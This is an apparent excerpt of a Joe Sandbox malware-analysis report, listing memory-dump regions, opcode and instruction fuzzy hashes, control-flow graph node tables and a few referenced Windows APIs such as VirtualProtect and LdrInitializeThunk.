                                                                      • Source File: 00000000.00000002.1512832339.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_56b0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 695a1f8252645d5b81a7f049d4da5776696e3bf1cdec3a637af38cb26576f72b
                                                                      • Instruction ID: ce3db7bc8a7e1db228f2e63a9dd6e177d1084a80babea6d7f8d9efdc28342462
                                                                      • Opcode Fuzzy Hash: 695a1f8252645d5b81a7f049d4da5776696e3bf1cdec3a637af38cb26576f72b
                                                                      • Instruction Fuzzy Hash: D2F1E438A04219CFDB55DF28C894AA9B7F2BF88300F558699D90A9B361DF30ED81CF54
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1513584631.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_57f0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: adb8536e5ebf454fd058aac6ab8e667ca9df01032b86dc18a8e41ccae294d3b6
                                                                      • Instruction ID: f25301599634122236a1b81a0794ea8d93588afbf915bc9565886d468cbaadd1
                                                                      • Opcode Fuzzy Hash: adb8536e5ebf454fd058aac6ab8e667ca9df01032b86dc18a8e41ccae294d3b6
                                                                      • Instruction Fuzzy Hash: 77C14C34A00204CFDB08DF68E494BAE77F3FB88311F218069D506AB355DB79AE81DB95
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1513584631.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_57f0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 019fe5ea052f8ca894c01e7a8874eebe975c7af7994ed8fe815973c2a4802727
                                                                      • Instruction ID: 4bcdd5be2f730226bd187a704bb93fed10457dff1879558224eb4ed874a7428d
                                                                      • Opcode Fuzzy Hash: 019fe5ea052f8ca894c01e7a8874eebe975c7af7994ed8fe815973c2a4802727
                                                                      • Instruction Fuzzy Hash: ADC14B34A00204CFDB08DF68E494BAE77F3FB89311F218069D6069B355DB79AE81DB95
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1513584631.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_57f0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5409ac557c24e35b6b65523f31f37b46e11048566c6e2ecd630e74726ef72879
                                                                      • Instruction ID: c22f996a5579b8942059cfe338f49db22edfa516ed7bb4915d6603b94775d0f3
                                                                      • Opcode Fuzzy Hash: 5409ac557c24e35b6b65523f31f37b46e11048566c6e2ecd630e74726ef72879
                                                                      • Instruction Fuzzy Hash: AEB16C70E0020ACFDB10CFA9C8857AEBBF2BF88714F148529D915EB394EB759845DB91
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1512832339.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_56b0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cc4b1811caf3d78577f87adec3508e3404cbfce8fdeb0e2b9cf8ee999d41fcbb
                                                                      • Instruction ID: de369de2f087090b2bfee02d489807e33e377da32305df19e986438a81d4a104
                                                                      • Opcode Fuzzy Hash: cc4b1811caf3d78577f87adec3508e3404cbfce8fdeb0e2b9cf8ee999d41fcbb
                                                                      • Instruction Fuzzy Hash: C5A13830A04205CFFB14CB59D444BEABBBBFB84305F188065D501AB795DBB89EC6CB54
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1513584631.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_57f0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b9e602c6e99b8fb119d225e6cb36a79a092a1615e2ce4afdc0cdf2c28cc5a379
                                                                      • Instruction ID: a1923c180060a56ef1275038eb69fb3dff4d1607837cfed93bd1f9128e950960
                                                                      • Opcode Fuzzy Hash: b9e602c6e99b8fb119d225e6cb36a79a092a1615e2ce4afdc0cdf2c28cc5a379
                                                                      • Instruction Fuzzy Hash: 5C910334B00204CFEB18DF79D458BAA7BB3BB88305F248468E6069B395DB359C85DB50
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1512832339.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_56b0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8f55e6591dd7c37c559802dacd4190f8d61b05dccd67e724e05d67ba22b407bc
                                                                      • Instruction ID: 10983fff16181ed4b829ff3f187f58541235326685691eb49951d53e059e5a66
                                                                      • Opcode Fuzzy Hash: 8f55e6591dd7c37c559802dacd4190f8d61b05dccd67e724e05d67ba22b407bc
                                                                      • Instruction Fuzzy Hash: 87912730A04209CBEB14CF59D444BEABBBBFB84315F188065D501AB755DBB8AEC1CB95
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1513584631.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_57f0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: de4f3716470367bfa3776af7224ad14fd238bf77f7744f8001d77d4fb79b8cd7
                                                                      • Instruction ID: b1df796291d18710959f804d4f73d62e71a69a73367c5627f4e8727e2f73acb1
                                                                      • Opcode Fuzzy Hash: de4f3716470367bfa3776af7224ad14fd238bf77f7744f8001d77d4fb79b8cd7
                                                                      • Instruction Fuzzy Hash: 17919D30A04100DFEB18CF69D948FAA77E3FB88305F558078D206AB755DB789E81EB94
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1513584631.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_57f0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: df08548aaa183c87fc602f615f66c942deb998851e0dc64fd2179c712593310a
                                                                      • Instruction ID: 75296e84253080d10c6a65ae1044a1f81a22bc4637612c2feddfde9bd2448a6d
                                                                      • Opcode Fuzzy Hash: df08548aaa183c87fc602f615f66c942deb998851e0dc64fd2179c712593310a
                                                                      • Instruction Fuzzy Hash: C9918E30A04104DFEB18CF69D948FAA73E3FB88305F558078D206AB755DB789E81EB95
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1512832339.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_56b0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 357e75f5d25546d3fdf70ff80615a2e51546fbde4ab64fe9a9134cc201492bc3
                                                                      • Instruction ID: 8f28709ca120578ba6d7745d2a30ef5792a6b214003efdfce1fccb69e2691a44
                                                                      • Opcode Fuzzy Hash: 357e75f5d25546d3fdf70ff80615a2e51546fbde4ab64fe9a9134cc201492bc3
                                                                      • Instruction Fuzzy Hash: 79912430A04209CBEB14CF59D444BEABBABBB84315F188065D501AB795CBB89EC2CB95
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1505397932.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2eb0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8545c621648d33f27624729c1c68c0ba9e1b2561c1dfe5a8b80762ccf815ff56
                                                                      • Instruction ID: 1fd2e146442877a9ad5761477a028aa40694b4cbec0090d8f331c8f420f00439
                                                                      • Opcode Fuzzy Hash: 8545c621648d33f27624729c1c68c0ba9e1b2561c1dfe5a8b80762ccf815ff56
                                                                      • Instruction Fuzzy Hash: 4B612A70E02645CFEB08DF7AE84179ABBE3EBC8200F14C679C005AB265EF3819159F95
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1512832339.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_56b0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0ec5962903131c5c359319aa7e0c84b4bf514f2720565d10238cb2ec5ee1b859
                                                                      • Instruction ID: 49e1030d952718886eae474dbcb7eed314b56d49d9de10b24cc54fe4cecbe994
                                                                      • Opcode Fuzzy Hash: 0ec5962903131c5c359319aa7e0c84b4bf514f2720565d10238cb2ec5ee1b859
                                                                      • Instruction Fuzzy Hash: 2A515C30A00110CFEB14CB29D458BEA77A3FB85705F198175D6069B7A6CBB89EC6CB91
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1505397932.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2eb0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f4f10ad921561ae88ca6dba2226ee01d0ac10d3880d689aa4dc69db434e383d5
                                                                      • Instruction ID: f6d1bd190a503cc914c6978240b376b86720ab314e78248b7f6b7613a73b9e8f
                                                                      • Opcode Fuzzy Hash: f4f10ad921561ae88ca6dba2226ee01d0ac10d3880d689aa4dc69db434e383d5
                                                                      • Instruction Fuzzy Hash: 72511B70E02645CBEB08DF7AE84079ABBE3FBC8200F04C639C004AB265EF7859159F95
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1513584631.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_57f0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: deec1af1ffe6afd96472a20ce327c205e6c85ec3a6d0157f61611a7eceec02b7
                                                                      • Instruction ID: a015f31f5a16b8928f7093ae4434a85ec4f4149f914aed1cc99ba0c03bdae1ba
                                                                      • Opcode Fuzzy Hash: deec1af1ffe6afd96472a20ce327c205e6c85ec3a6d0157f61611a7eceec02b7
                                                                      • Instruction Fuzzy Hash: A3516970A14104DFEB18CF69D944BAA73E3FB84345F248074E202AB795DB789E81EB55

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 56b18f0-56b1967 1 56b1969 0->1 2 56b196e-56b1980 0->2 1->2 4 56b198f-56b199b 2->4 5 56b1982 2->5 6 56b2229 4->6 7 56b19a1-56b19a6 4->7 205 56b1989 call 56b2c08 5->205 206 56b1989 call 56b2bf8 5->206 10 56b222e-56b2232 6->10 8 56b19d9-56b19f9 7->8 9 56b19a8-56b19b1 7->9 8->6 23 56b19ff-56b1ae2 8->23 9->6 11 56b19b7-56b19d4 9->11 12 56b21e5-56b21fc 10->12 13 56b2234 10->13 14 56b2328-56b232e 11->14 39 56b2207-56b221e 12->39 16 56b223b-56b2258 13->16 17 56b225d-56b227f 13->17 18 56b22c6-56b22ec 13->18 19 56b22a5-56b22c4 13->19 20 56b2284-56b22a3 13->20 21 56b2338 14->21 22 56b2330 14->22 38 56b231b-56b2323 16->38 17->38 40 56b22ee-56b2305 18->40 41 56b2315 18->41 19->38 20->38 22->21 60 56b1ae8-56b1af4 23->60 61 56b1e97-56b1ec8 23->61 38->14 39->6 40->6 46 56b230b-56b2313 40->46 41->38 46->40 46->41 60->6 62 56b1afa-56b1b49 60->62 69 56b1eca-56b1ef6 61->69 70 56b1f2d-56b1f5e 61->70 82 56b1b4b-56b1b54 62->82 83 56b1b56-56b1b7e 62->83 80 56b1ef8-56b1efb 69->80 81 56b1f10-56b1f2b 69->81 84 56b2066-56b20ae 70->84 85 56b1f64-56b2001 70->85 80->81 86 56b1efd-56b1f0d 80->86 81->69 81->70 82->83 101 56b1b8a-56b1bb2 83->101 102 56b1b80-56b1b85 83->102 92 56b210b-56b2117 84->92 93 56b20b0-56b2105 84->93 133 56b2029-56b202c 85->133 134 56b2003-56b2027 85->134 86->81 97 56b211e-56b214f 92->97 93->92 112 56b21be-56b21e0 97->112 113 56b2151-56b2181 97->113 118 56b1bbe-56b1be6 101->118 119 56b1bb4-56b1bb9 101->119 104 56b1e7f-56b1e91 102->104 104->60 104->61 112->14 113->39 127 56b2187-56b218f 113->127 131 56b1be8-56b1bed 118->131 132 56b1bf2-56b1c20 118->132 119->104 127->6 130 56b2195-56b219c 127->130 130->10 135 56b21a2-56b21bc 130->135 131->104 148 56b1c2c-56b1c5a 132->148 149 56b1c22-56b1c27 132->149 136 56b203f 133->136 137 56b202e-56b203d 133->137 141 56b204b-56b2060 134->141 135->112 135->113 136->141 137->141 141->84 141->85 153 56b1c5c-56b1c61 148->153 154 56b1c66-56b1c94 148->154 149->104 153->104 158 56b1ca0-56b1cce 154->158 159 56b1c96-56b1c9b 154->159 163 56b1cda-56b1d08 158->163 164 56b1cd0-56b1cd5 158->164 159->104 168 56b1d0a-56b1d0f 163->168 169 56b1d14-56b1d3c 163->169 164->104 168->104 173 56b1d48-56b1d70 169->173 174 56b1d3e-56b1d43 169->174 178 56b1d7c-56b1da4 173->178 179 56b1d72-56b1d77 173->179 174->104 183 56b1db0-56b1dd8 178->183 184 56b1da6-56b1dab 178->184 179->104 188 56b1dda-56b1ddf 183->188 189 56b1de4-56b1e0c 183->189 184->104 188->104 193 56b1e0e-56b1e13 189->193 194 56b1e15-56b1e43 189->194 193->104 198 56b1e4c-56b1e74 194->198 199 56b1e45-56b1e4a 194->199 203 56b1e7d 198->203 204 56b1e76-56b1e7b 198->204 199->104 203->104 204->104 205->4 206->4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1512832339.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_56b0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 2
                                                                      • API String ID: 0-450215437
                                                                      • Opcode ID: f3f326c760c565ffdfc368f93441a91b7a91f8ee23a82c1f32461fd27cb9f893
                                                                      • Instruction ID: 75cad28f298920e4d8a3dc1b8a30732dde6aafc28d8d984b427b85ec1ba4622f
                                                                      • Opcode Fuzzy Hash: f3f326c760c565ffdfc368f93441a91b7a91f8ee23a82c1f32461fd27cb9f893
                                                                      • Instruction Fuzzy Hash: C8522A74A002198FEB15DF64D894BEDBBF2BF89300F1081AAD50AAB391DB749D85CF51

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 207 6463f98-6463fa0 208 6463fa4-6463fe6 call 6462e50 207->208 209 6463fa2-6463fa3 207->209 213 64644e3-646451b 208->213 214 6463fec-6464001 call 6462e50 208->214 209->208 231 6464522-646455a 213->231 214->213 220 6464007-646400b 214->220 221 6464022-6464032 220->221 222 646400d-6464017 call 6460aa0 220->222 228 6464034-6464036 221->228 229 6464039-6464057 221->229 391 6464019 call 6464a21 222->391 392 6464019 call 64649cd 222->392 393 6464019 call 6464a68 222->393 394 6464019 call 6464848 222->394 395 6464019 call 6464838 222->395 228->229 236 64641e7-6464234 229->236 237 646405d-6464067 call 6462e50 229->237 230 646401f 230->221 252 6464561-646459b 231->252 276 64645e2-646461a 236->276 277 646423a-646425c 236->277 389 6464069 call 6464d98 237->389 390 6464069 call 6464d89 237->390 244 646406f-6464073 245 64641b7-64641bb 244->245 246 6464079-646407d 244->246 247 64640b5-64640fe call 64601a0 245->247 248 64641c1-64641c5 245->248 249 646408e 246->249 250 646407f-646408c 246->250 268 6464104-6464106 247->268 269 6464100-6464102 247->269 253 64645a3-64645db 248->253 254 64641cb 248->254 255 6464093-6464095 249->255 250->255 252->253 253->276 254->247 255->231 257 646409b-64640a5 255->257 257->231 266 64640ab-64640af 257->266 266->247 266->252 273 646410d-646410f 268->273 269->268 272 6464108 269->272 272->273 274 6464111-6464136 call 64601a0 call 64605b0 273->274 275 646413b-646415e 273->275 274->275 281 6464182-6464197 275->281 282 6464160-6464180 275->282 296 6464621-6464659 276->296 295 6464262-6464275 277->295 277->296 288 646419f-64641a5 281->288 282->281 292 64641a7-64641a9 288->292 293 64641d0-64641e4 288->293 292->293 297 64641ab-64641b4 292->297 303 6464277-646427b 295->303 304 646429c-64642a2 295->304 311 6464660-646468c 296->311 307 646428c 303->307 308 646427d-646428a 303->308 305 6464694-64646d1 304->305 306 64642a8 304->306 346 64646d8-64646dc 305->346 310 64642d5-64642e6 306->310 306->311 312 6464331-646439d 306->312 313 64643ae-6464416 306->313 314 64642af-64642d0 306->314 315 6464291-6464293 307->315 308->315 317 64642f7 310->317 318 64642e8-64642f5 310->318 311->305 363 646439f 312->363 364 64643ab 312->364 361 6464424 313->361 362 6464418 313->362 336 6464439-646444f 314->336 315->304 319 6464295 315->319 325 64642fc-6464300 317->325 318->325 319->304 328 6464302-646430e 325->328 329 646431c 325->329 328->329 342 6464310-646431a 328->342 330 6464322-646432c 329->330 330->336 345 6464455 336->345 336->346 342->330 350 646474e-6464778 345->350 351 646477f-64647c6 345->351 352 646445c-6464460 345->352 353 64646de-64646e2 346->353 354 64646e9-6464715 346->354 350->351 357 6464462-6464470 352->357 358 646449c-64644e0 352->358 359 64646e4 353->359 360 646471d-6464747 353->360 354->360 372 6464472-646447d 357->372 373 646447f-6464484 357->373 359->351 360->350 361->336 362->361 363->364 364->313 380 646448f-6464497 call 6460158 372->380 373->380 380->358 389->244 390->244 391->230 392->230 393->230 394->230 395->230
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1523614912.0000000006460000.00000040.00000800.00020000.00000000.sdmp, Offset: 06460000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6460000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID: 0-3916222277
                                                                      • Opcode ID: 6957b57db1dd38bbf649d2c50c7076f5dbac53492dc205bb359b961910e850bc
                                                                      • Instruction ID: 850f6e5cd3dce179d075935ebc7f78d83fd23eaf1f7ad650e89cb946ba0a9073
                                                                      • Opcode Fuzzy Hash: 6957b57db1dd38bbf649d2c50c7076f5dbac53492dc205bb359b961910e850bc
                                                                      • Instruction Fuzzy Hash: 0D227E34A002098FEB55DF65C5947AE77F2EF88300F50846AE906AB380DF799D56CF92

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 451 57f2a00-57f2a1d 452 57f2a22-57f2a25 451->452 453 57f2a49-57f2a7f 452->453 454 57f2a27 452->454 459 57f2b13-57f2b20 453->459 454->453 455 57f2c1f 454->455 456 57f2c9e 454->456 457 57f2b57-57f2b6a 454->457 458 57f2cb3-57f2cc1 454->458 454->459 460 57f2b93-57f2ba1 454->460 461 57f2a90-57f2aa1 LdrInitializeThunk 454->461 462 57f2a2e-57f2a45 454->462 463 57f2b2c-57f2b3c 454->463 464 57f2ae4 454->464 465 57f2ce3-57f2cec 454->465 466 57f2ba3 454->466 467 57f2c02-57f2c19 454->467 468 57f2c81-57f2c98 454->468 469 57f2c75-57f2c78 455->469 479 57f2c9f 456->479 470 57f2b6c-57f2b70 457->470 499 57f2cc8-57f2cd6 458->499 459->464 493 57f2b22-57f2b27 459->493 486 57f2b87-57f2b8a 460->486 477 57f2aa6-57f2aca 461->477 462->452 471 57f2a47 462->471 463->459 494 57f2b3e-57f2b4c 463->494 480 57f2aec-57f2aee 464->480 475 57f2bf6-57f2bf9 466->475 467->475 490 57f2c1b-57f2c1d 467->490 468->469 488 57f2c9a-57f2c9c 468->488 469->456 474 57f2c7a 469->474 470->460 484 57f2b72-57f2b83 470->484 471->452 474->456 474->468 475->467 487 57f2bfb 475->487 477->470 479->479 491 57f2b06-57f2b0e 480->491 492 57f2af0-57f2af6 480->492 484->486 495 57f2b85 484->495 486->460 501 57f2b8c 486->501 487->455 487->456 487->467 487->468 488->469 490->475 498 57f2a84-57f2a87 491->498 496 57f2afa-57f2afc 492->496 497 57f2af8 492->497 493->498 494->498 500 57f2b52 494->500 495->486 496->491 497->491 498->464 504 57f2a89 498->504 499->452 505 57f2cdc-57f2cde 499->505 500->498 501->455 501->456 501->460 501->466 501->467 501->468 504->455 504->456 504->457 504->459 504->460 504->461 504->463 504->464 504->466 504->467 504->468 505->452 505->465
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1513584631.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_57f0000_test.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 7f66c77e08ab6362e28ed67ed76a30e27f9fa906e43836897404b3c2592a0146
                                                                      • Instruction ID: 2bdd75441988709dee176d851470e6e0d874c2105935857137bb43e4835b4f65
                                                                      • Opcode Fuzzy Hash: 7f66c77e08ab6362e28ed67ed76a30e27f9fa906e43836897404b3c2592a0146
                                                                      • Instruction Fuzzy Hash: D051AF38A04105CFDB24CF64DD48BAA77B3FB88315F204079DA02AB796DB789D81EB55

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 604 57f2acf-57f2ae2 607 57f2ae4 604->607 608 57f2b13-57f2b20 604->608 610 57f2aec-57f2aee 607->610 608->607 611 57f2b22-57f2b27 608->611 612 57f2b06-57f2b0e 610->612 613 57f2af0-57f2af6 610->613 614 57f2a84-57f2a87 611->614 612->614 615 57f2afa-57f2afc 613->615 616 57f2af8 613->616 614->607 617 57f2a89 614->617 615->612 616->612 617->607 617->608 618 57f2c1f 617->618 619 57f2c9e 617->619 620 57f2b2c-57f2b3c 617->620 621 57f2b57-57f2b6a 617->621 622 57f2b93-57f2ba1 617->622 623 57f2ba3 617->623 624 57f2c02-57f2c19 617->624 625 57f2c81-57f2c98 617->625 626 57f2a90-57f2aa1 LdrInitializeThunk 617->626 628 57f2c75-57f2c78 618->628 636 57f2c9f 619->636 620->608 641 57f2b3e-57f2b4c 620->641 627 57f2b6c-57f2b70 621->627 638 57f2b87-57f2b8a 622->638 631 57f2bf6-57f2bf9 623->631 624->631 643 57f2c1b-57f2c1d 624->643 625->628 640 57f2c9a-57f2c9c 625->640 634 57f2aa6-57f2aca 626->634 627->622 637 57f2b72-57f2b83 627->637 628->619 630 57f2c7a 628->630 630->619 630->625 631->624 639 57f2bfb 631->639 634->627 636->636 637->638 644 57f2b85 637->644 638->622 646 57f2b8c 638->646 639->618 639->619 639->624 639->625 640->628 641->614 645 57f2b52 641->645 643->631 644->638 645->614 646->618 646->619 646->622 646->623 646->624 646->625
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1513584631.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_57f0000_test.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 2ca90cd07c11f50cb6e2e17894fab67b82eb4520d3af2c65e84bac1ed16dd51c
                                                                      • Instruction ID: cf1df437cbd6f2604b6aae8b9c8382276a392b10ad4d99ab072d6fe1bc16fba2
                                                                      • Opcode Fuzzy Hash: 2ca90cd07c11f50cb6e2e17894fab67b82eb4520d3af2c65e84bac1ed16dd51c
                                                                      • Instruction Fuzzy Hash: B1415738A04106CFDB24CF50DD48BAA37B3FB48315F244475DA02AB796DB789D81EB61

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 647 56a61d0-56a61e2 648 56a620c-56a6210 647->648 649 56a61e4-56a6205 647->649 650 56a621c-56a622b 648->650 651 56a6212-56a6214 648->651 649->648 653 56a622d 650->653 654 56a6237-56a6263 650->654 651->650 653->654 657 56a6269-56a626f 654->657 658 56a6490-56a64a5 654->658 659 56a6341-56a6345 657->659 660 56a6275-56a627b 657->660 671 56a6508-56a6521 658->671 672 56a64a7-56a64d7 658->672 663 56a6368-56a6371 659->663 664 56a6347-56a6350 659->664 660->658 662 56a6281-56a628e 660->662 666 56a6320-56a6329 662->666 667 56a6294-56a629d 662->667 669 56a6373-56a6393 663->669 670 56a6396-56a6399 663->670 664->658 668 56a6356-56a6366 664->668 666->658 673 56a632f-56a633b 666->673 667->658 674 56a62a3-56a62bb 667->674 675 56a639c-56a63a2 668->675 669->670 670->675 693 56a64d9 672->693 694 56a64ed-56a64f9 672->694 673->659 673->660 676 56a62bd 674->676 677 56a62c7-56a62d9 674->677 675->658 681 56a63a8-56a63bb 675->681 676->677 677->666 689 56a62db-56a62e1 677->689 681->658 682 56a63c1-56a63d1 681->682 682->658 687 56a63d7-56a63e4 682->687 687->658 688 56a63ea-56a63ff 687->688 688->658 698 56a6405-56a6428 688->698 690 56a62ed-56a62f3 689->690 691 56a62e3 689->691 690->658 696 56a62f9-56a631d 690->696 691->690 697 56a64dc-56a64de 693->697 699 56a64fb 694->699 700 56a6505-56a6507 694->700 701 56a6522-56a654f call 56a1408 697->701 702 56a64e0-56a64eb 697->702 698->658 705 56a642a-56a6435 698->705 699->700 700->671 711 56a6551-56a6557 701->711 712 56a6567-56a6569 701->712 702->694 702->697 707 56a6486-56a648d 705->707 708 56a6437-56a6441 705->708 708->707 716 56a6443-56a6459 708->716 714 56a655b-56a655d 711->714 715 56a6559 711->715 735 56a656b call 56a65e8 712->735 736 56a656b call 56a7790 712->736 714->712 715->712 721 56a645b 716->721 722 56a6465-56a647e 716->722 717 56a6571-56a6575 718 56a65c0-56a65d0 717->718 719 56a6577-56a658e 717->719 719->718 728 56a6590-56a659a 719->728 721->722 722->707 730 56a659c-56a65ab 728->730 731 56a65ad-56a65bd 728->731 730->731 735->717 736->717
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1512625132.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_56a0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: d
                                                                      • API String ID: 0-2564639436
                                                                      • Opcode ID: fa1e2d31b5185a06e0271d9eb7c4365f997ce67b6f624432dfd61962247eced3
                                                                      • Instruction ID: bb7b195eed611a8676c2a91a67cc1104551d79b51e5e19b8c3abbedeb0de746d
                                                                      • Opcode Fuzzy Hash: fa1e2d31b5185a06e0271d9eb7c4365f997ce67b6f624432dfd61962247eced3
                                                                      • Instruction Fuzzy Hash: C3D15836A006068FCB24CF68C584A6AB7F2FF88314B19CA59D45A9B755DB30FC46CF94

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 737 2ebf398-2ebf419 VirtualProtect 740 2ebf41b-2ebf421 737->740 741 2ebf422-2ebf447 737->741 740->741
                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 02EBF40C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1505397932.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2eb0000_test.jbxd
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: a5d16f500d01473e754508cd6ad7f9b075a182cb6f1de4746dc9055ecd3e6859
                                                                      • Instruction ID: f52529cce6952142c3f58ca87207407a93ea64d179f269bc05a3e2c4ea05ba15
                                                                      • Opcode Fuzzy Hash: a5d16f500d01473e754508cd6ad7f9b075a182cb6f1de4746dc9055ecd3e6859
                                                                      • Instruction Fuzzy Hash: E111E3B59002099BDB10DFAAC884BEEFBF4EF48210F14842AE519A7650C7799944CFA1

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
